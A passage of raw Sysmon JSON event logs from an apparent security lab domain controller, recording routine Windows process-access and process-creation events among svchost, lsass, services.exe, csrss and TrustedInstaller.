C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1071,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.584\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2912\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.584","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"2912","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1072,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1073,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1074,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.584\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2912\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.584","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"2912","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1075,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.602\r\nProcessGuid: {E2A3D6B1-1060-5F25-0000-00100B640200}\r\nProcessId: 3012\r\nImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nFileVersion: 10.0.14393.3564 (rs1_release.200303-1942)\r\nDescription: Windows Modules Installer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: TrustedInstaller.exe\r\nCommandLine: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.602","ProcessGuid":"{E2A3D6B1-1060-5F25-0000-00100B640200}","Image":"C:\\Windows\\servicing\\TrustedInstaller.exe","FileVersion":"10.0.14393.3564 (rs1_release.200303-1942)","Description":"Windows Modules Installer","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"TrustedInstaller.exe","CommandLine":"C:\\Windows\\servicing\\TrustedInstaller.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1076,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.599\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1244\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-00100B640200}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.599","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1244","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-00100B640200}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1077,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.599\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-00100B640200}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.599","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-00100B640200}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1078,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.599\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1180\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-00100B640200}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 